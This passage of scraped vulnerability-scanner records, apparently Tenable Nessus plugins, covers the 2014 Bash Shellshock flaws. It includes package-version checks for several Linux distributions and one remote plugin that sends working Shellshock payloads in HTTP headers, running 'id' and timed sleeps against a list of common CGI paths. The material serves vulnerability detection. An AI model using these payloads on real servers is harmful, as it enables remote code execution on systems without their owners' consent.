(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.8.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). 
Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : bash (CESA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# CentOS Errata and Security Advisory 2014:1306 
respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77879);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : bash (CESA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. 
For more information see the Knowledgebase\narticle at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e6f3298\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7dcec836\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020651.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d96a66d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:centos:centos:7\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/CentOS/release\");\nif (! version) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (ereg(string:version, pattern:\"release 5\\.([0-9]([^0-9]|$)|10([^0-9]|$))\", icase: 1))\n{\n #CentOS release 5.0-5.10\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_10.4\")) flag++;\n}\nelse \n{\n #CentOS release 5.11\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n}\n\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": 
{"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:36", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the upstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which resolves various bugs.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : bash (MDVSA-2014:190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:bash", "p-cpe:/a:mandriva:linux:bash-doc", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-190.NASL", "href": "https://www.tenable.com/plugins/nessus/77950", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:190. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77950);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137);\n script_xref(name:\"MDVSA\", value:\"2014:190\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mandriva Linux Security Advisory : bash (MDVSA-2014:190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. 
Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue\n(CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the\nupstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which\nresolves various bugs.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-4.2-48.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-doc-4.2-48.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-06T15:41:13", "description": "The remote web server is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {}, "published": "2015-04-06T00:00:00", "type": "nessus", "title": "GNU Bash Incomplete Fix Remote Code Injection (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_6278.NASL", "href": "https://www.tenable.com/plugins/nessus/82581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82581);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"GNU Bash Incomplete Fix Remote Code Injection (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. 
This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for\nCVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6278\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_timeout(480);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Do not use get_http_port() here\nport = get_kb_item(\"Services/www\");\nif (!port) port = 80;\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n# Do not test broken web servers\nbroken_web = get_kb_item(\"Services/www/\" + port + \"/broken\");\n\n# Do not test CIM servers as HTTP GET requests can lead to FP situations\nif (port == get_kb_item(\"Services/cim_listener\") || broken_web)\n exit(0, 'The web server on port ' +port+ ' is broken.');\n\ncgis = make_list('/');\n\ncgis1 = get_kb_list('www/'+port+'/cgi');\nif (!isnull(cgis1)) cgis = make_list(cgis, cgis1);\n\ncgidirs = get_kb_list('www/'+port+'/content/extensions/*');\nif (!isnull(cgidirs) && !thorough_tests)\n{\n foreach dir (cgidirs)\n {\n if (preg(pattern:'^/+cgi-bin', string:dir, icase:TRUE))\n cgis = make_list(dir, cgis);\n }\n}\n\n# Add common cgi scripts\ncgis = list_uniq(make_list(cgis,\n \"/_mt/mt.cgi\",\n \"/admin.cgi\",\n \"/administrator.cgi\",\n \"/buglist.cgi\",\n \"/cgi/mid.cgi\",\n \"/cgi-bin/admin\",\n \"/cgi-bin/admin.cgi\",\n \"/cgi-bin/admin.pl\",\n \"/cgi-bin/administrator\",\n \"/cgi-bin/administrator.cgi\",\n \"/cgi-bin/agorn.cgi\",\n \"/cgi-bin/bugreport.cgi\",\n \"/cgi-bin/cart.cgi\",\n \"/cgi-bin/clwarn.cgi\",\n \"/cgi-bin/count.cgi\",\n \"/cgi-bin/Count.cgi\",\n \"/cgi-bin/faqmanager.cgi\",\n \"/cgi-bin/FormHandler.cgi\",\n 
\"/cgi-bin/FormMail.cgi\",\n \"/cgi-bin/guestbook.cgi\",\n \"/cgi-bin/help.cgi\",\n \"/cgi-bin/hi\",\n \"/cgi-bin/index.cgi\",\n \"/cgi-bin/index.pl\",\n \"/cgi-bin/index.sh\",\n \"/cgi-bin/login\",\n \"/cgi-bin/login.cgi\",\n \"/cgi-bin/mailit.pl\",\n \"/cgi-bin/mt/mt-check.cgi\",\n \"/cgi-bin/mt/mt-load.cgi\",\n \"/cgi-bin/mt-static/mt-check.cgi\",\n \"/cgi-bin/mt-static/mt-load.cgi\",\n \"/cgi-bin/ncbook/book.cgi\",\n \"/cgi-bin/printenv\",\n \"/cgi-bin/printenv.cgi\",\n \"/cgi-bin/quickstore.cgi\",\n \"/cgi-bin/search\",\n \"/cgi-bin/search.cgi\",\n \"/cgi-bin/search/search.cgi\",\n \"/cgi-bin/status\",\n \"/cgi-bin/status.cgi\",\n \"/cgi-bin/test.cgi\",\n \"/cgi-bin/test.sh\",\n \"/cgi-bin/test-cgi\",\n \"/cgi-bin/upload.cgi\",\n \"/cgi-bin/urlcount.cgi\",\n \"/cgi-bin/viewcvs.cgi\",\n \"/cgi-bin/wa\",\n \"/cgi-bin/wa.cgi\",\n \"/cgi-bin/wa.exe\",\n \"/cgi-bin/whois.cgi\",\n \"/cgi-bin-sdb/printenv\",\n \"/cgi-mod/index.cgi\",\n \"/cgi-sys/defaultwebpage.cgi\",\n \"/cgi-sys/entropysearch.cgi\",\n \"/index.cgi\",\n \"/index.pl\",\n \"/index.sh\",\n \"/nph-mr.cgi\",\n \"/query.cgi\",\n \"/session_login.cgi\",\n \"/show_bug.cgi\",\n \"/test\",\n \"/test.cgi\",\n \"/ucsm/isSamInstalled.cgi\",\n \"/whois.cgi\",\n \"/wp-login.php\",\n \"/wwwadmin.cgi\",\n \"/wwwboard.cgi\",\n \"/xampp/cgi.cgi\"));\n\nif (thorough_tests) exts = make_list(\"*\");\nelse exts = make_list(\"cgi\", \"php\", \"php5\", \"pl\", \"py\", \"rb\", \"sh\", \"java\", \"jsp\", \"action\", \"do\", \"shtml\");\n\nforeach ext (exts)\n{\n cgis2 = get_kb_list('www/'+port+'/content/extensions/'+ext);\n if (!isnull(cgis2)) cgis = list_uniq(make_list(cgis2, cgis));\n}\n\nif ( thorough_tests )\n headers = make_list('User-Agent', 'Referrer', 'Cookie');\nelse\n headers = make_list('User-Agent');\n\nscript = SCRIPT_NAME - \".nasl\";\nint1 = rand() % 100;\nint2 = rand() % 100;\n\n\n\nEXPLOIT_TYPE_WAIT = 0;\nEXPLOIT_TYPE_STDOUT = 1;\n\n\nexploits = make_list();\nn = 0;\n\nexploits[n++] = 
make_array(\n\t\"type\",\tEXPLOIT_TYPE_STDOUT,\n\t\"payload\", '() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"' + script+' Output : $((' + int1 + '+'+int2+'))\"; }',\n \t\"pattern\", script + \" Output : \" + int(int1 + int2),\n\t\"followup\", \"() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id; }\"\n\t);\nif (report_paranoia == 2)\n{\n exploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_WAIT,\n\t\"payload\", '() { _; } >_[$($())] { echo; /bin/sleep $WAITTIME; }'\n\t);\n}\n\n\nvuln = FALSE;\nWaitTime = 5;\n\nforeach cgi (cgis)\n{\nforeach exploit ( exploits )\n{\n foreach header (headers)\n {\n then = unixtime();\n\n if ( exploit[\"type\"] == EXPLOIT_TYPE_WAIT && report_paranoia == 2 )\n {\n http_set_read_timeout(WaitTime * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime), string:exploit[\"payload\"]);\n }\n else payload = exploit[\"payload\"];\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, payload),\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n # Check that we added our two random numbers and get our expected output\n # ie : int1 = 40, int2 = 65 output should be the following :\n # bash_cve_2014_6271_rce Output : 105\n if (exploit[\"type\"] == EXPLOIT_TYPE_STDOUT && exploit[\"pattern\"] >< res[2])\n {\n vuln = TRUE;\n attack_req = http_last_sent_request();\n\n match = pregmatch(pattern:\"(\"+exploit[\"pattern\"]+\")\", string:res[2]);\n if (isnull(match) || empty_or_null(match[1])) output = chomp(res[2]);\n else output = match[1];\n\n # Try and run id if our above request was a success\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, exploit[\"followup\"]),\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res2[2]))\n {\n attack_req = http_last_sent_request();\n match2 = 
pregmatch(pattern:\"(uid=[0-9]+.*gid=[0-9]+.*)\",string:res2[2]);\n\n if (isnull(match2) || empty_or_null(match2[1])) output = chomp(res2[2]);\n else output = match2[1];\n }\n }\n else if ( report_paranoia == 2 && exploit[\"type\"] == EXPLOIT_TYPE_WAIT && now - then >= WaitTime )\n {\n InitialDelta = now - then;\n attack_req = http_last_sent_request();\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n WaitTime1 = WaitTime;\n vuln = TRUE;\n\n # Test again with sleep set to 5, 10, and 15\n wtimes = make_list(5, 10, 15);\n\n for ( i = 0 ; i < max_index(wtimes) && vuln == TRUE; i ++ )\n {\n WaitTime1 = wtimes[i];\n http_set_read_timeout(WaitTime1 * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime1), string:exploit[\"payload\"]);\n then1 = unixtime();\n res = http_send_recv3(method : \"GET\", port : port, item : cgi, add_headers : make_array(header, payload), exit_on_fail : FALSE);\n now1 = unixtime();\n\n if ( now1 - then1 >= WaitTime1 && now1 - then1 <= (WaitTime1 + 5 ))\n {\n attack_req = http_last_sent_request();\n InitialDelta = now1 - then1;\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n continue;\n }\n else\n {\n\tvuln = FALSE;\n }\n }\n }\n if (vuln) break;\n }\n if (vuln) break;\n }\n if (vuln) break;\n}\n\n\nif (!vuln) exit(0, \"The web server listening on port \"+port+\" is not affected.\");\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 2,\n request : make_list(attack_req),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:37", "description": "According to its self-reported version, the remote host is running a version of Cisco UCS Director that could be affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can be exploited.", "cvss3": {}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "Cisco UCS Director Code Injection (CSCur02877) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:ucs_director"], "id": "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "href": "https://www.tenable.com/plugins/nessus/78770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78770);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", 